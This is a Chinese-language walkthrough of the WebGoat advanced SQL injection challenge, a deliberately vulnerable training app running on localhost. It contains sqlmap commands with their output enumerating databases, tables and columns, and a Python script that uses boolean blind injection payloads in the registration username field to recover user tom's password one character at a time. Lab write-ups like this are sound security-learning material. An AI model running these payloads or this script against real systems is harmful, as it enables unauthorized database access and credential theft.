经过测试,发现注册时的用户名处存在布尔盲注,将如下内容保存为request.txt,开始用sqlmap
:
PUT http://127.0.0.1:8080/WebGoat/SqlInjection/challenge HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://127.0.0.1:8080/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Cookie: JSESSIONID=61E3648728C46675C274BC0980B448BE
Connection: keep-alive
Host: 127.0.0.1:8080
username_reg=hello&email_reg=1%40q.com&password_reg=world&confirm_password_reg=world
要注意的是Cookie有时限
执行如下命令:
# 探测数据库类型,结果为:HSQLDB,并且建议加--no-cast参数
sqlmap -r request.txt -p username_reg
# 查数据库,获取3个数据库名:
# [*] INFORMATION_SCHEMA
# [*] PUBLIC
# [*] SYSTEM_LOBS
sqlmap -r request.txt -p username_reg --dbs --no-cast
# 查PUBLIC数据库,选择爆破,线程选最大的10,得到6张表
# Database: PUBLIC
# [6 tables]
# +--------------+
# | auth |
# | employee |
# | roles |
# | servers |
# | transactions |
# | user_data |
# +--------------+
sqlmap -r request.txt -p username_reg -D PUBLIC --tables --no-cast
# 获取user_data表的字段
# Database: PUBLIC
# Table: USER_DATA
# [10 columns]
# +-------------+-------------+
# | Column | Type |
# +-------------+-------------+
# | cc_number | non-numeric |
# | cc_type | non-numeric |
# | cookie | non-numeric |
# | email | non-numeric |
# | first_name | non-numeric |
# | last_name | non-numeric |
# | login_count | numeric |
# | password | non-numeric |
# | today | numeric |
# | userid | numeric |
# +-------------+-------------+
sqlmap -r request.txt -p username_reg -D PUBLIC -T user_data --columns --no-cast
# 最后一步出错了,,,
通过看源码发现,自己连正确的表都没有注出来,sqlmap就不指望了,写脚本跑吧
# coding:utf8
"""
True: already exists please try to register with a different username.
False: created, please proceed to the login page.
我解这个问题其实是在蒙,用sqlmap爆破发现register的username_reg有bool盲注,然后用sqlmap一通,知道一个表中有password字段,然后sqlmap再往下就出错了,没办法,写脚本吧,已经知道了字段,就直接盲注字段,老是不对,看源码才知道用户名原来是tom,小写的t,这样就得到密码了
但其实看源码之后才发现,sqlmap搞出来的表和我要注入的表是不一样的,就这样吧,误打误撞出来了
源码位置: WebGoat/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/plugin/advanced/SqlInjectionChallenge.java
"""
import requests
def get_status(content):
if 'already exists please try to register with a different username.' in content:
return 1
elif 'created, please proceed to the login page.' in content:
return 0
else:
return -1
url = 'http://127.0.0.1:8080/WebGoat/SqlInjection/challenge'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Referer': 'http://127.0.0.1:8080/WebGoat/start.mvc',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '85',
'Cookie': 'JSESSIONID=F15EA9332EAE5CFBD726887EA270BC9C',
'Connection': 'keep-alive',
'Host': '127.0.0.1:8080',
}
data = {
'username_reg': 'a',
'email_reg': 'a@a.com',
'password_reg': 'a',
'confirm_password_reg': 'a',
}
s = requests.session()
tom_pass_len = 0
for i in range(2, 100):
data['username_reg'] = "tom' AND LENGTH(password)=%d AND '1'='1" % i
res = s.put(url, headers=headers, data=data)
if get_status(res.content) == -1:
print 'Error'
print res.content
exit(0)
elif get_status(res.content) == 0:
continue
elif get_status(res.content) == 1:
print 'password len: %d' % i
tom_pass_len = i
break
tom_password = ['*'] * tom_pass_len
common_chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
for i in range(1, tom_pass_len+1):
for c in common_chars:
data['username_reg'] = "tom' AND SUBSTRING(password, %d, 1)='%s" % (i, c)
res = s.put(url, headers=headers, data=data)
if get_status(res.content) == -1:
print 'Error'
print res.content
exit(0)
elif get_status(res.content) == 0:
continue
elif get_status(res.content) == 1:
print c
tom_password[i-1] = c
break
print 'tom_password: ', ''.join(tom_password)
参考: https://klarsen.net/infosec/owasp-webgoat-sql-advanced-lesson/